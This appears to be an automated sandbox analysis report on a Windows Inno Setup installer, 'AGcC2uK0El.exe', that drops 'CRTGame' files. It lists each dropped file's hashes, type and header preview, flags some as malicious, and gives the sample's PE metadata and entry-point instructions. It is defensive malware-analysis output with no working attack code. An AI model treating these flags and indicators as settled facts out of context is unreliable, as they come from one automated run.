                                                                                  Category:dropped
                                                                                  Size (bytes):315918
                                                                                  Entropy (8bit):6.5736483262229735
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:zvhrZEi7+khFXxn+m0GJjExfTKqyNwEozbpT80kqD6jD1TlT5Tjalc:zvz17FhtBnLot8XD1T3ac
                                                                                  MD5:201EA988661F3D1F9CA5D93DA83425E7
                                                                                  SHA1:D0294DF7BA1F6CB0290E1EFEBB5B627A11C8B1F5
                                                                                  SHA-256:4E4224B946A584B3D32BBABB8665B67D821BB8D15AB4C1CC4C39C71708298A39
                                                                                  SHA-512:6E6FA44CE2E07177DEC6E62D0BEE5B5D3E23A243D9373FB8C6EEECEC6C6150CBD457ED8B8C84AB29133DFE954550CA972DEC504069CC411BD1193A24EA98AAEE
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):112640
                                                                                  Entropy (8bit):6.540227486061059
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                                  MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                                  SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                                  SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                                  SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):772608
                                                                                  Entropy (8bit):6.546391052615969
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
                                                                                  MD5:B3B487FC3832B607A853211E8AC42CAD
                                                                                  SHA1:06E32C28103D33DAD53BE06C894203F8808D38C1
                                                                                  SHA-256:30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
                                                                                  SHA-512:FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):294926
                                                                                  Entropy (8bit):6.191604766067493
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                                  MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                                  SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                                  SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                                  SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):13838
                                                                                  Entropy (8bit):5.173769974589746
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
                                                                                  MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
                                                                                  SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
                                                                                  SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
                                                                                  SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):258560
                                                                                  Entropy (8bit):6.491223412910377
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
                                                                                  MD5:DB191B89F4D015B1B9AEE99AC78A7E65
                                                                                  SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
                                                                                  SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
                                                                                  SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:modified
                                                                                  Size (bytes):2207670
                                                                                  Entropy (8bit):6.40492801249664
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:WgUuC+Q/Wk0q61pnaabTniY7A5YVoZgMOuBKWqk05myavB1W1oxYxixrJu+cTjX7:WgYx+dzPawTf7Fv+KlzP+VuUkD
                                                                                  MD5:3362BAC458070E33D0CABCDA1E4B735C
                                                                                  SHA1:76AC1F5B96667D9621EEDD92AB0704B9C7A129B0
                                                                                  SHA-256:4DBFD9DF16A57D8FF7A00A378FE737EFC179F53F2CE975DAEAEDBAA6AB8BCECD
                                                                                  SHA-512:59ED8A9D16E100AD91D98AD3A08EABE148234633E59BFB4BEF1B63E5A54C3E63193F088AD1538C4898A7A6AC5EAD65A2E244AE64BC5325BBF87E763474C5A5CE
                                                                                  Malicious:true
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2207670
                                                                                  Entropy (8bit):6.404927634828125
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:RgUuC+Q/Wk0q61pnaabTniY7A5YVoZgMOuBKWqk05myavB1W1oxYxixrJu+cTjX7:RgYx+dzPawTf7Fv+KlzP+VuUkD
                                                                                  MD5:84F957AF586E13BF92DCD452B58496FA
                                                                                  SHA1:95B1A7A0BBA84445E702A56B3DD01EC397F5527F
                                                                                  SHA-256:2E6BBB5A6808C368A8BCCD6FF0032931873BFC870EBD3F97715777C918391667
                                                                                  SHA-512:6603F265DFA10D2124BA700946F386B1C97645E4C70C6A5A0406746E943DFB59356DDC8D4820512C1CCFB8D62222B55787DC8CF497620337B7FD63CB117D7B35
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:IFF data
                                                                                  Category:dropped
                                                                                  Size (bytes):1716
                                                                                  Entropy (8bit):4.781797138644031
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                                  MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                                  SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                                  SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                                  SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                                  Malicious:false
                                                                                  Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1825
                                                                                  Entropy (8bit):5.088030483893024
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                  MD5:992C00BEAB194CE392117BB419F53051
                                                                                  SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                  SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                  SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                  Malicious:false
                                                                                  Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):714526
                                                                                  Entropy (8bit):6.5053900039496435
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
                                                                                  MD5:3910EA485B6F67ECAF6B34DDB4BE5980
                                                                                  SHA1:85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
                                                                                  SHA-256:FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
                                                                                  SHA-512:65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:InnoSetup Log CRTGame, version 0x30, 8021 bytes, 124406\user, "C:\Program Files (x86)\CRTGame"
                                                                                  Category:dropped
                                                                                  Size (bytes):8021
                                                                                  Entropy (8bit):5.0517778119094086
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:/3N8WVPpHLbK+T4hlOIhlXWx4cVSQs0Ln9qE2VYW4W:/98WVPpHF+QIhs+cVSQ1n8mQ
                                                                                  MD5:C9949727FA8DCF2D9AFD4D4B32FFD6CB
                                                                                  SHA1:42F6918388A430ADBE51459E332C1E89150E9241
                                                                                  SHA-256:061499CAD7FC7E0669C93B1A3162F71A52D077DFCF89F622BB7891677B5CA62A
                                                                                  SHA-512:D1B609B2C5C0FE8DD88E6477DB80382D40EBD48C91BF0E2460F707D6F69D32E6B8C4ECABD560D0EF30EDB82A06F76DB375D454E62FA4F3EA46E663F030E3B80F
                                                                                  Malicious:false
                                                                                  Preview:Inno Setup Uninstall Log (b)....................................CRTGame.........................................................................................................................CRTGame.........................................................................................................................0...G...U...%................................................................................................................Q.>.................?....124406.user.C:\Program Files (x86)\CRTGame.................. ..........h.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...............................o...........!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dll.GetSystemMet
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):714526
                                                                                  Entropy (8bit):6.5053900039496435
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
                                                                                  MD5:3910EA485B6F67ECAF6B34DDB4BE5980
                                                                                  SHA1:85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
                                                                                  SHA-256:FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
                                                                                  SHA-512:65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
                                                                                  Malicious:false
                                                                                  Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                                  Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2207670
                                                                                  Entropy (8bit):6.40492801249664
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:WgUuC+Q/Wk0q61pnaabTniY7A5YVoZgMOuBKWqk05myavB1W1oxYxixrJu+cTjX7:WgYx+dzPawTf7Fv+KlzP+VuUkD
                                                                                  MD5:3362BAC458070E33D0CABCDA1E4B735C
                                                                                  SHA1:76AC1F5B96667D9621EEDD92AB0704B9C7A129B0
                                                                                  SHA-256:4DBFD9DF16A57D8FF7A00A378FE737EFC179F53F2CE975DAEAEDBAA6AB8BCECD
                                                                                  SHA-512:59ED8A9D16E100AD91D98AD3A08EABE148234633E59BFB4BEF1B63E5A54C3E63193F088AD1538C4898A7A6AC5EAD65A2E244AE64BC5325BBF87E763474C5A5CE
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L....ue.................`...................p....@...........................!......."......................................y..P........G...........................................................................p...............................text....[.......`.................. ..`.rdata.......p... ...p..............@..@.data....P.......0..................@....rsrc....G.......P..................@..@.hsave.......@......................`...................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):4
                                                                                  Entropy (8bit):0.8112781244591328
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:1ln:v
                                                                                  MD5:34F45818F16D1BBB62BA5874B8814CC7
                                                                                  SHA1:A454CA483B4A66B83826D061BE2859DD79FF0D6C
                                                                                  SHA-256:DC765660B06EE03DD16FD7CA5B957E8C805161AC2C4AF28C5A100AB2AB432CA1
                                                                                  SHA-512:65711C8D556639DDFC14CE292B2415F3A2824D003AF1A530093B8E0B70B695E6C639694B7B90C6750B1129566D9A3784ED274667988D4B227DB2AC9B6CF7548B
                                                                                  Malicious:false
                                                                                  Preview:....
                                                                                  Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):128
                                                                                  Entropy (8bit):2.862976125752538
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:1k/QnTzXD9iIgAnDTa3pkHil/:11TzXD9iIxPa3pkHit
                                                                                  MD5:785BB7F0B0CEF59C39B9F5E21CD2FD04
                                                                                  SHA1:1E1FFDEE1584A00BDE18BD7BD19C02988301C250
                                                                                  SHA-256:90B35EC0C6B41ACEC2C9BB51CDDCB6339FB035C222766A4CA4CBB15B7A7D8853
                                                                                  SHA-512:6D2449E111F7F059734960B83B0B090A7239EE2D93EB70F839ECDDAA640658B90667F123CFB4FE8E0F5DC0A854A47B62AA2FCAF971D08B9118CAC840DBF999EB
                                                                                  Malicious:false
                                                                                  Preview:3e0f25005939fee32fa196d33e7a2b8f6ce30e1128f6a30e537a9ba072d59a73................................................................
                                                                                  Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  File Type:ISO-8859 text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):8
                                                                                  Entropy (8bit):2.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:1Clt:I
                                                                                  MD5:66525B08BFDE09653EAFF883D4B3BC40
                                                                                  SHA1:F6DB827691CA8AC78C1AF344F41E5E328532CFE2
                                                                                  SHA-256:FAE1834F590D06296EA76379433C1CF85AF89133D13636ABAB0114200A9AF58A
                                                                                  SHA-512:CD951A0E89A0B3899D68684D281B658369CE7A327855EBDE32C6E8B5303CB3229E8411F0634D367505465973D9F3D1204401E05E2F0D6BEEFA2A85C5555D2C23
                                                                                  Malicious:false
                                                                                  Preview:.e]g....
                                                                                  Process:C:\Users\user\Desktop\AGcC2uK0El.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):704000
                                                                                  Entropy (8bit):6.4972640482038075
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:XRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExyc:BObekrkfohrP337uzHnA6cHiiHEVVg6X
                                                                                  MD5:F448D7F4B76E5C9C3A4EAFF16A8B9B73
                                                                                  SHA1:31808F1FFA84C954376975B7CDB0007E6B762488
                                                                                  SHA-256:7233B85EB0F8B3AA5CAE3811D727AA8742FEC4D1091C120A0FE15006F424CC49
                                                                                  SHA-512:F8197458CD2764C0B852DAC34F9BF361110A7DC86903024A97C7BCD3F77B148342BF45E3C2B60F6AF8198AE3B83938DBAAD5E007D71A0F88006F3A0618CF36F4
                                                                                  Malicious:true
                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):4096
                                                                                  Entropy (8bit):4.026670007889822
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                                  MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                                  SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                                  SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                                  SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2560
                                                                                  Entropy (8bit):2.8818118453929262
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                  MD5:A69559718AB506675E907FE49DEB71E9
                                                                                  SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                  SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                  SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):19456
                                                                                  Entropy (8bit):5.8975201046735535
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:ED4NeA1PrXPBdHCNPJEQkWybd0oBSRnAZ806OSDrgtOFXqYUPYNQLJ/k+9tPEBer:64NHPfHCs6GNOpiM+RFjFyzcN23A
                                                                                  MD5:3ADAA386B671C2DF3BAE5B39DC093008
                                                                                  SHA1:067CF95FBDB922D81DB58432C46930F86D23DDED
                                                                                  SHA-256:71CD2F5BC6E13B8349A7C98697C6D2E3FCDEEA92699CEDD591875BEA869FAE38
                                                                                  SHA-512:BBE4187758D1A69F75A8CCA6B3184E0C20CF8701B16531B55ED4987497934B3C9EF66ECD5E6B83C7357F69734F1C8301B9F82F0A024BB693B732A2D5760FD303
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P.......................................................................P.......P..(............................p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):6144
                                                                                  Entropy (8bit):4.215994423157539
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                  MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                  SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                  SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                  SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):23312
                                                                                  Entropy (8bit):4.596242908851566
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                  MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                  SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                  SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                  SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.999439818720794
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                                  • Inno Setup installer (109748/4) 1.08%
                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  File name:AGcC2uK0El.exe
                                                                                  File size:7'280'524 bytes
                                                                                  MD5:3ec3e60970e2d0d38df3b5e571e8514d
                                                                                  SHA1:e2c9975f6fda0cbbfaa434e25b6645450cb926ea
                                                                                  SHA256:113106967e66077d88c8cf6dae8170d74479b3c4f7a2fc284719eb39cef28ce8
                                                                                  SHA512:55df7ef052fc553de96dc5b83cc3d36388ef653dad3471ed007febd851b692c4528a3fd3c4da0dbdd483fa1d292b80deb867f1e6e2ce21878bd1701d845847a3
                                                                                  SSDEEP:196608:FxnTNzjsOzc7TGHscDgcXbIdslX38dgFYJzj:7NztzQlcDPXus98d9Jzj
                                                                                  TLSH:AB7633A3AA51E2B2C140CDFC2DA3C058D25739239E248E6E254EA5DEE77E751180FF71
                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                  Icon Hash:2d2e3797b32b2b99
                                                                                  Entrypoint:0x409c40
                                                                                  Entrypoint Section:CODE
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x65765E5F [Mon Dec 11 00:57:03 2023 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:1
                                                                                  OS Version Minor:0
                                                                                  File Version Major:1
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:1
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                                  Instruction
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  add esp, FFFFFFC4h
                                                                                  push ebx
                                                                                  push esi
                                                                                  push edi
                                                                                  xor eax, eax
                                                                                  mov dword ptr [ebp-10h], eax
                                                                                  mov dword ptr [ebp-24h], eax
                                                                                  call 00007FB898D761ABh
